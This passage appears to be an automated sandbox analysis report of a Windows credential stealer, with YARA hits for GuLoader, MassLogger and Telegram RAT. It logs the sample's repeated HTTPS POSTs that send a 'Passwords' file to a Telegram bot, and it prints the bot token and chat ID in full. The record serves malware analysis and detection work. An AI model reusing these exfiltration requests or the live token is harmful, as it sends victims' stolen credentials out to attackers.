                                                                                                            2025-01-10 21:32:48 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43613,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544768,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            43192.168.2.350062149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:49 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd366edcb90021
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:49 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 36 65 64 63 62 39 30 30 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd366edcb90021Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:50 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:50 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:50 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43614,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544770,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            44192.168.2.350064149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:51 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd36fd39d5822d
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:51 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 66 64 33 39 64 35 38 32 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd36fd39d5822dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:52 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:51 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:52 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 37 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43615,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544771,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            45192.168.2.350066149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:53 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd37464fcfa082
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:53 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 37 34 36 34 66 63 66 61 30 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd37464fcfa082Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:53 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:53 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:53 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 37 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43616,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544773,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            46192.168.2.350068149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:54 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd37840a32eeab
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:54 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 37 38 34 30 61 33 32 65 65 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd37840a32eeabContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:55 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:55 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:55 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 37 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43617,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544775,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            47192.168.2.350070149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:56 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd37db51e674d1
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 21:32:56 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 37 64 62 35 31 65 36 37 34 64 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd37db51e674d1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:57 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:56 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:57 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43618,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544776,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                            48192.168.2.350072149.154.167.220443
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:33:01 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31947219ce40
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 21:33:01 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 39 34 37 32 31 39 63 65 34 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31947219ce40Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:33:01 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:33:01 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:33:01 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43619,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544781,"document":{"file_n


                                                                                                            Click to jump to process

                                                                                                            Click to jump to process

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Click to jump to process

                                                                                                            Target ID:0
                                                                                                            Start time:16:30:49
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\6ZoBPR3isG.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:1'039'043 bytes
                                                                                                            MD5 hash:DCAE922F4D3C1946B3C41158BE23DC2A
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1650191934.0000000003386000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:3
                                                                                                            Start time:16:31:19
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\6ZoBPR3isG.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:1'039'043 bytes
                                                                                                            MD5 hash:DCAE922F4D3C1946B3C41158BE23DC2A
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.2616593291.00000000017C6000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:false

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:19.7%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:20%
                                                                                                              Total number of Nodes:1599
                                                                                                              Total number of Limit Nodes:38
